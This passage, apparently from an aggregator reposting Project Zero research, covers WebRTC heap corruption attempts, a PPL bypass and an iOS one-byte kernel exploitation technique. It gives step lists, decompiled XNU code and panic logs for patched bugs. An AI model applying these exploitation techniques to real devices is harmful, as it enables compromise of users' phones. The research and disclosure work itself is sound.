It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.
RefCountedObject vtable;size_t size_;size_t capacity_;std::unique_ptr<T[]> data_;
I was hoping that it would be possible to make the clipped pointer to this structure to point to some other object on the heap that had a pointer in the location of the data_ pointer, and that data would get sent instead. However, it turned out that in the process of sending data, all four members on the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties. 
I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.
0x[...]0000      buffer 00x[...]0030      buffer 10x[...]0060      buffer 20x[...]0090      buffer 30x[...]00c0      buffer 40x[...]00f0       buffer 50x[...]0120      buffer 6...   If the first byte of buffers 0 through 5 are set to zero by the vulnerability, they will land on a valid buffer, but if buffer 6 is set to zero, it will not, because 256 doesn’t divide evenly into 48. The end result is that every time the bug hits the SendPacketMessageData  object, there is only a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, and the backing has been replaced by something containing pointers added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.
I also looked a lot at how outgoing packets are generated by WebRTC, especially Remote Transport Control Protocol (RTCP), which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.
I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.
I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.
I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.
Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.
Kategorie: Hacking & Security

The core of Apple is PPL: Breaking the XNU kernel's kernel

31 Červenec, 2020 - 18:19
Posted by Brandon Azad, Project Zero
While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.
PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.
I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.
However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.
Some memory corruption in pmap_remove_options_internal(). Using a kernel function calling primitive, both va_start and size are controlled.
The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.
MARK_AS_PMAP_TEXT static intpmap_remove_options_internal(        pmap_t pmap,        vm_map_address_t start,        vm_map_address_t end,        int options)
The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.
static intpmap_remove_range_options(        pmap_t pmap,        pt_entry_t *bpte,   // The first L3 TTE to remove        pt_entry_t *epte,   // The end of the TTEs        uint32_t *rmv_cnt,        int options)
Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:
remove_count = pmap_remove_range_options(                   pmap,                   &l3_table[(va_start >> 14) & 0x7FF],                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),                   &rmv_spte,                   options);
This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.

But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!
So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.
Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.
    flush_mmu_tlb_region_asid_async(va_start, size, pmap);
This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.
That's pretty much exactly how the PPL bypass works:
  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.
This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.
Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not yet clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.
Kategorie: Hacking & Security

One Byte to rule them all

30 Červenec, 2020 - 18:17
Posted by Brandon Azad, Project Zero
One Byte to rule them all, One Byte to type them,One Byte to map them all, and in userspace bind them-- Comment above vm_map_copy_t
For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?
In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.I - The Fellowship of the WiringA struct of powerWhile looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:
struct vm_map_copy {        int                     type;#define VM_MAP_COPY_ENTRY_LIST          1#define VM_MAP_COPY_OBJECT              2#define VM_MAP_COPY_KERNEL_BUFFER       3        vm_object_offset_t      offset;        vm_map_size_t           size;        union {                struct vm_map_header    hdr;      /* ENTRY_LIST */                vm_object_t             object;   /* OBJECT */                uint8_t                 kdata[0]; /* KERNEL_BUFFER */        } c_u;};
This looked interesting to me for several reasons:
  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.
Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.
A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.
Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.

With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.
As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:
kern_return_tvm_map_copyout_internal(    vm_map_t                dst_map,    vm_map_address_t        *dst_addr,      /* OUT */    vm_map_copy_t           copy,    vm_map_size_t           copy_size,    boolean_t               consume_on_success,    vm_prot_t               cur_protection,    vm_prot_t               max_protection,    vm_inherit_t            inheritance){...    if (copy->type == VM_MAP_COPY_OBJECT) {...    }...    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {...    }...    vm_map_lock(dst_map);...    adjustment = start - vm_copy_start;...    /*     *    Adjust the addresses in the copy chain, and     *    reset the region attributes.     */    for (entry = vm_map_copy_first_entry(copy);        entry != vm_map_copy_to_entry(copy);        entry = entry->vme_next) {...        entry->vme_start += adjustment;        entry->vme_end += adjustment;...        /*         * If the entry is now wired,         * map the pages into the destination map.         */        if (entry->wired_count != 0) {...            object = VME_OBJECT(entry);            offset = VME_OFFSET(entry);...            while (va < entry->vme_end) {...                m = vm_page_lookup(object, offset);...                vm_fault_enter(m,      // Calls pmap_enter_options()                    dst_map->pmap,     // to map m->vmp_phys_page.                    va,                    prot,                    prot,                    VM_PAGE_WIRED(m),                    FALSE,            /* change_wiring */                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */                    &fault_info,                    NULL,             /* need_retry */                    &type_of_fault);...                offset += PAGE_SIZE_64;                va += PAGE_SIZE;           }       }   }...        vm_map_copy_insert(dst_map, last, copy);...    vm_map_unlock(dst_map);...}
Let's walk through this step-by-step. First, other vm_map_copy types are handled:
    if (copy->type == VM_MAP_COPY_OBJECT) {...    }...    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {...    }
The vm_map is locked:
We enter a for loop over the linked list of (fake) vm_map_entry objects:
    for (entry = vm_map_copy_first_entry(copy);        entry != vm_map_copy_to_entry(copy);        entry = entry->vme_next) {
We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:
        if (entry->wired_count != 0) {
When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:
            object = VME_OBJECT(entry);            offset = VME_OFFSET(entry);...            while (va < entry->vme_end) {
We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:
                m = vm_page_lookup(object, offset);
And finally, we call vm_fault_enter() to fault in the page:
                vm_fault_enter(m,      // Calls pmap_enter_options()                    dst_map->pmap,     // to map m->vmp_phys_page.                    va,                    prot,                    prot,                    VM_PAGE_WIRED(m),                    FALSE,            /* change_wiring */                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */                    &fault_info,                    NULL,             /* need_retry */                    &type_of_fault);
The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:
kern_return_tpmap_enter_options(        pmap_t pmap,        vm_map_address_t v,        ppnum_t pn,        vm_prot_t prot,        vm_prot_t fault_type,        unsigned int flags,        boolean_t wired,        unsigned int options,        __unused void   *arg)
pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.
Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

An old friendI decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.
First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.
Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.
This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.Leaving the ShireWe've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:
  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  1. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.
  1. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.A short cut to PANAn important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.
While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.
Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.
However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.
Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.At the sign of the panicking POCWith kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.
We start by creating the shared memory region in the kernel.
We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.
Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

At this point, we have a kernel thread that is spinning ready to map any physical page we request.
To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.

This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

The mines of memoryAt this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.
My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.
The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.
But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.
The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.

At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.
As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.
However, I quickly ran into panics when trying to map the kernelcache:
panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"
This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.
The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.
In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.
if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {    panic("%s: page belongs to PPL, " ...);}
if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {    panic("%s: page locked down, " ...);}
The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.
And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two TechniquesThe road to DRAM's guardYet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).
With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.
The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).
However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:
panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.
On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.
To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.
Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.The voice of PPLWhat did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:
wimg_bits = pmap_cache_attributes(pn); // checks io_attr_tableif ( flags )    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;pte |= wimg_to_pte(wimg_bits);if ( wimg_bits & 0x4000 ){    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;    if ( xprr_perm == 0xB )        pte_perm_bits = 0x20000000000080LL;    else if ( xprr_perm == 3 )        pte_perm_bits = 0x20000000000000LL;    else        panic("Unsupported xPRR perm ...");    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;}pmap_enter_pte(pmap, pte_p, pte, vaddr);
Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:
    addr         len        wimg     signature0x620000000, 0x40000000,       0x27, 'PCIe'0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave...0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base
Thus, we cannot map the DART into userspace to disable it.The palantírEven though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.
My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.
